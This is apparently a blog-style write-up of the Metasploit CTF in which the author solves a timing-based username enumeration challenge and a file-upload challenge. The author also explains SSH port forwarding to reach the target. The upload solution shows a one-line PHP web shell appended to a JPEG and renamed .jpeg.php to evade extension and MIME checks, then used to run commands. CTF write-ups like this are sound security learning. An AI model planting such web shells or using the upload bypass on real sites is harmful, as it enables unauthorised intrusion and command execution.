Recently I’ve been looking into Metasploit and HackTheBox (soon I will publish some write-ups of the boxes I’ve owned) and I was getting some experience in pentesting machines. So I’ve came across this CTF a few days before it started, while looking for something else related to Metasploit and I’ve decided to try it.
I was a bit disappointed because I was expecting more stuff similar to HackTheBox, so that I could practice more with Metasploit, instead felt more similar to past CTFs I took part of, with a mixture of challenges that were similar to real life situations, and simple puzzles (I’m looking at you, Buffalo challenge, port 4545 which apparently someone solved by simply inputting the word buffalo for 200 times).
The way this CTF was structured: you had access to 2 machines, one with Kali -to which you had to connect to with provided ssh keys- and the target machine, reachable through the Kali machines. So the options (at least the ones I thought of) where two:
- Connecting to the Kali machine, and then do everything from there, from the command line
- Funnel through SSH and then do everything with my local machine
I’ve opted for the second option, I was more comfortable in using my own version of kali with Burp and other software and scripts I’m used to use, but for some tests I’ve also used the provided Kali machine (e.g. I had several connectivity issue with my home internet, so I uploaded on the remote kali machine a brute force script and run it from there, leaving it all the night attempting passwords).
The target machine had a number of ports open, each one with a different challenge, so it was a matter to connect to a specific port and solve the challenge and get the flag. In this challenge the “flag” was the MD5 of pictures found on the target machines, with the names of poker cards. So you find the picture, then through some script like md5sum you find the MD5 of that picture and put it in the challenge section of the MetasploitCTF dashboard.
I’ve engaged with a core number of challenges, making progresses on some of them, and in the end I’ve found 2 flags (without considering the 3rd one, that was simply a welcome flag found on the port 80 of the target machine).
Here’s the writeup of the two challenges.
Scanning and enumeration
This was the NMap report with a list of all the open ports and challenges:
[email protected]:~$ nmap -T4 -A -p- 220.127.116.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 15:16 UTC Nmap scan report for 18.104.22.168 Host is up (0.0092s latency). Not shown: 65515 closed ports PORT STATE SERVICE VERSION 80/tcp open http nginx 1.19.5 |_http-server-header: nginx/1.19.5 |_http-title: Metasploit CTF 1080/tcp open socks5 (No authentication; connection failed) | socks-auth-info: |_ No authentication 1337/tcp open waste? | fingerprint-strings: | GenericLines, GetRequest, HTTPOptions, RTSPRequest: | Welcome to the '9 of Clubs' service. | ------------------------------- | Please choose an option: | Send contact info | Greetings | Send feedback | Exit | Unknown option. | Welcome to the '9 of Clubs' service. | ------------------------------- | Please choose an option: | Send contact info | Greetings | Send feedback | Exit | NULL: | Welcome to the '9 of Clubs' service. | ------------------------------- | Please choose an option: | Send contact info | Greetings | Send feedback |_ Exit 4545/tcp open http SimpleHTTPServer 0.6 (Python 3.8.5) |_http-server-header: SimpleHTTP/0.6 Python/3.8.5 |_http-title: Directory listing for / 5555/tcp open telnet | fingerprint-strings: | NULL: | [HSCORE: 0 | [HSCORE: 1 | [HSCORE: 2 | [HSCORE: 3 |_ [HSCORE: 4 6868/tcp open http WSGIServer 0.2 (Python 3.8.5) |_http-server-header: WSGIServer/0.2 CPython/3.8.5 |_http-title: Photos5u 8080/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html). 8092/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 8101/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: 5 of Clubs Frontend 8123/tcp open http WSGIServer 0.2 (Python 3.8.5) |_http-server-header: WSGIServer/0.2 CPython/3.8.5 |_http-title: Salt Free Hashes 8200/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Home 8201/tcp open http nginx 1.19.5 |_http-server-header: nginx/1.19.5 |_http-title: Did not follow redirect to http://intranet.metasploit.ctf:8201 8202/tcp open http nginx 1.19.5 |_http-server-header: nginx/1.19.5 |_http-title: Site doesn't have a title (text/html). 8888/tcp open http Werkzeug httpd 1.0.1 (Python 3.8.5) |_http-title: Home 9000/tcp open http WEBrick httpd 1.6.0 (Ruby 2.7.0 (2019-12-25)) |_http-server-header: WEBrick/1.6.0 (Ruby/2.7.0/2019-12-25) |_http-title: Site doesn't have a title (text/html;charset=utf-8). 9001/tcp open http Thin httpd |_http-server-header: thin |_http-title: CtfChallenge 9007/tcp open http Apache httpd 2.4.46 ((Unix)) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.46 (Unix) |_http-title: Index of / 9008/tcp open java-object Java Object Serialization 9009/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4c:0f:d8:c5:a2:f1:54:f9:92:30:df:62:1f:52:e6:fe (RSA) | 256 6e:b8:6f:94:e6:c0:2f:15:0c:80:71:32:cb:d0:2a:00 (ECDSA) |_ 256 8a:55:03:98:8e:87:29:50:66:1a:57:4c:5b:10:a4:01 (ED25519) 9010/tcp open http Apache httpd 2.4.38 | http-ls: Volume / | SIZE TIME FILENAME | 3.2K 2020-12-01 15:29 QOH_Client.jar |_ |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Index of /
Looks like there were a number of different services running on this Ubuntu 18.04 machine, like nginx/1.19.5, Apache/2.4.38 , Werkzeug httpd 1.0.1, WEBrick httpd 1.6.0, WSGIServer 0.2, and other stuff that you would see enumerating and investigating every single port/challenge.
This challenge on the port 8080 was about finding the other username that was valid, other than ‘guest’. When trying manually ‘guest’ and another couple of common ones like ‘admin’ for example. You would try to login with some random credentials and then a new page with a message woud load, telling if the credentials used were of a valid or not.
I noticed that the loading time of the ‘guest’ attempt was much longer than the others. So I thought that this challenge could be resolved by bruteforcing a number of different usernames and then check which ones had a response time similar to ‘guest’. I usually use Burp Suite, but it’s the Community Edition, so has it slows down bruteforcing actions. I’ve then decided to use OWASP ZAP, that’s a perfectly fine alternative to Burp Suite (maybe even better in some respects), which has no such limitations.
I’ve first tried the xato-net-10-million-passwords-1000.txt with 10k passwords but didn’t find anything, as well as using the famous rockyou list. So I’ve decided to use the full 10 Millions xato password list and I found another username that had a response time longer than others: ‘demo’.
I submitted my answer on the site and boom: flag found.
So the first thing I thought of was to try uploading a shell instead of a picture. So I loaded Burp Suite, setup the proxy to intercept the requests and tried to upload a shell.php by renaming it to .jpg.
After a few attempts it was clear that the uploader checked two things:
- The extension of the file
- The MIME type
What I did then was to create a file harpocrates.php with this code inside: `<?=`$_GET[harpo]`?>` then append it to a real image I’ve downloaded, using the Kali command line:
cat hackerman.jpeg harp.php > harpocrates.jpeg.php
This step was necessary to bypass the mime type check. I originally tried to simply add the prefix of a jpg file signature to the simple shell code by forging the request on Burp, but for some reason it didn’t work so I resorted to just use a real image and append at the bottom the shell code.
And I had to rename the file to .jpeg.php to make it pass the file extension check.
At that point I simply had to go to <URL_of_file>/harpocrates.jpeg.php?harpo= and I could run all the commands I needed, like ls -la to see the content of the folder, whoami to see the user, etc.
I’ll be honest, I spent on this challenge much more time than needed, because I wasn’t root and I was coming after a week of HTB challenges, so I spent some time trying to find a way to become root, upload a meterpreter shell, other exploits, etc. For example I even tried to upload a better shell, p0wny.
In the end, the solution was much more simple. A couple of folders up, there was an hidden folder with the flag, so I simply visited that URL.
The above image also shows an interesting fact: when running commands, you would see the response either by checking the “response” tab on Burp, or by opening the page with the view source code option, which made the responses much more clear. If you noticed the previous image, the result of the ls -la command is not as readable as the one in the above image, on the left.
So, I went to that URL, grabbed the image and submitted its MD5. Challenge completed.
Funnelling through SSH
When looking at Discord/Slack, some people were asking how to connect to the target, as they weren’t used to the type of setup we had in this CTF so I thought to provide an explanation on how I did it, in case anyone may find it useful for future situations.
Every team had .pem file, and then the two machines to use for the CTF, a Kali machine (to use as an entry point and/or the attacking machine) and a Target connected to the Kali machine.
So I decided to use an SSH Funnel, opening specific port on my localhost so that I could connect to the target directly from my host browser, funnelling the traffic through the Kali machine. To do that I’ve used this command:
ssh -L <local_port>:<target_machine_IP>:<target_port> <username>:<kali_machine_IP> -i <pem file> -M
so I would choose a random local port, and then (using the above 8802 port challenge, and my assigned Kali’s and Target machine’s IPs, as well as pem key), the command would look like this:
ssh -L 8880:22.214.171.124:8802 [email protected] -i metasploit_ctf_kali_ssh_key.pem -M
After lunching that command in the terminal, I simply had to open my browser and visit localhost:8880 to see the website of the challenge located on the target machine at the port 8802. Of course, there was an http service listening on that port, that’s why I was using my browser to visit it. In the case of other services, you would need to use a different software/service.